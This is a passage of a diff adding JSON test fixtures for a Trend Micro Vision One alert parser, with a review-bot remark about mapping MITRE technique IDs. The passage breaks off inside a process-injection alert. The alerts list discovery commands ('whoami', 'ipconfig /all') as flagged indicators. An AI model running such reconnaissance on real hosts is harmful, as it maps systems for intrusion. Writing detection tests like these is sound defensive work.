@@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"b4e0f834-178b-4a3d-a5ef-d44c603d1a48\", \"model\": \"Potential Information Gathering\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:48:06Z\", \"updatedDateTime\": \"2024-11-26T16:48:06Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a\"}]}, \"description\": \"A process has executed multiple discovery tools.\", \"matchedRules\": [{\"id\": \"1be9b378-eb8a-4736-92ba-55c184b2ca55\", \"name\": \"Potential Information Gathering\", \"matchedFilters\": [{\"id\": \"7062d4bd-33ca-4634-8f04-a7e4e8698548\", \"name\": \"WhoAmI Execution\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"mitreTechniqueIds\": [\"T1033\"], \"matchedEvents\": [{\"uuid\": \"54955525-b5ac-4b31-b5b7-0e03ba25aa4a\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"type\": 
\"TELEMETRY_PROCESS\"}]}, {\"id\": \"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\", \"name\": \"IPconfig Execution\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"mitreTechniqueIds\": [\"T1016\"], \"matchedEvents\": [{\"uuid\": \"7a733f00-faa0-4ac2-b97c-34d8f3ffd230\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\whoami.exe\\\"\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\" /all \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": 
[\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": 
\"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], 
\"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"b4e0f834-178b-4a3d-a5ef-d44c603d1a48\", \"model\": \"Potential Information Gathering\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:48:06Z\", \"updatedDateTime\": \"2024-11-26T16:48:06Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a\"}]}, \"description\": \"A process has executed multiple discovery tools.\", \"matchedRules\": [{\"id\": \"1be9b378-eb8a-4736-92ba-55c184b2ca55\", \"name\": \"Potential Information Gathering\", \"matchedFilters\": [{\"id\": \"7062d4bd-33ca-4634-8f04-a7e4e8698548\", \"name\": \"WhoAmI Execution\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"mitreTechniqueIds\": [\"T1033\"], \"matchedEvents\": [{\"uuid\": 
\"54955525-b5ac-4b31-b5b7-0e03ba25aa4a\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"type\": \"TELEMETRY_PROCESS\"}]}, {\"id\": \"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\", \"name\": \"IPconfig Execution\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"mitreTechniqueIds\": [\"T1016\"], \"matchedEvents\": [{\"uuid\": \"7a733f00-faa0-4ac2-b97c-34d8f3ffd230\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\whoami.exe\\\"\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\" /all \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": 
\"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": 
[\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": 
\"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Potential Information Gathering", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-26T16:48:06Z", + "host": { + "id": "7b00c266-f17f-439f-bb94-3945d463a78b", + "ip": [ + "10.0.0.6" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "hash": { + "sha1": "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55", + "sha256": "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8" + }, + "parent": { + "command_line": "C:\\Windows\\Explorer.EXE", + "executable": "C:\\Windows\\explorer.exe", + "hash": { + "sha256": "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753" + }, + "pid": 9920 + }, + "pid": 5040 + }, + "related": { + "hash": [ + "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753", + "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55", + "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8" + ], + "ip": [ + "10.0.0.6" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Potential Information Gathering" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } +} \ No newline at end of file 
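Review bot: The `matchedFilters` in the input carry MITRE ATT&CK technique IDs (`T1033`, `T1016`) and the `objectCmd` indicators hold the discovery commands that actually matched (`whoami.exe`, `ipconfig.exe /all`), yet neither appears in `expected`: there is no `threat.technique.id`, and `process.command_line` only keeps the parent PowerShell ISE `processCmd`. For a detection-oriented format this drops the two most useful triage fields; consider mapping `threat.technique.id` from `matchedRules[].matchedFilters[].mitreTechniqueIds` and surfacing `objectCmd` in a dedicated field, then pinning both here. The parser stages that produce `process.*` are outside this patch, so the exact mapping cannot be checked from here.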
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json index b31951fe2..5b8dbfc95 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json @@ -24,6 +24,7 @@ "path": "C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe" }, "host": { + "id": "3F783642-C0D0-4AFD-84B6-F6751E5BF80F", "ip": [ "1.2.3.4" ], diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json index 9c013b1c0..9a41ea92c 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_process.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json @@ -24,6 +24,7 @@ "path": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" }, "host": { + "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", "ip": [ "10.10.58.51" ], diff --git a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json new file mode 100644 index 000000000..dbeed8e8e --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json 
@@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"bec297c0-7e55-488e-b02a-192a87069661\", \"model\": \"Process Injection from Windows Temporary Location to System32\", \"modelType\": \"preset\", \"score\": 51, \"severity\": \"medium\", \"createdDateTime\": \"2024-07-23T07:49:48Z\", \"updatedDateTime\": \"2024-07-23T07:49:59Z\", \"ownerIds\": [], \"incidentId\": \"IC-14558-20240722-00000\", \"impactScope\": {\"desktopCount\": 14, \"serverCount\": 1, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"name\": \"CHTX-XMEDICA-2K12.windows10.local\", \"ips\": [\"19.112.87.74\"]}, \"entityId\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"name\": \"PRESTATAIR-2K19\", \"ips\": [\"1.231.184.40\"]}, \"entityId\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": 
\"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"name\": \"\", \"ips\": [\"\"]}, \"entityId\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"name\": \"XBURN-2K16\", \"ips\": [\"248.131.28.153\"]}, \"entityId\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"name\": \"LB-XMEDICA-2K12\", \"ips\": [\"247.47.158.155\"]}, \"entityId\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"name\": \"C2583-SCLITE1-2\", \"ips\": [\"174.76.164.124\"]}, \"entityId\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"name\": \"MONECHO-2K22\", \"ips\": [\"236.2.20.78\"]}, \"entityId\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"name\": \"DXRECUP-2K19-T.windows10.local\", \"ips\": 
[\"fe80::cd06:59d9:574d:d989%14\"]}, \"entityId\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"name\": \"XMEDPRINT-2K19\", \"ips\": [\"89.67.140.152\"]}, \"entityId\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"name\": \"SCR-2K16\", \"ips\": [\"156.39.139.182\"]}, \"entityId\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"48c7d9d7-54b0-4d1b-8150-3a1657a303d8\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"name\": \"ANTARES-2K16\", \"ips\": [\"82.9.180.60\"]}, \"entityId\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": 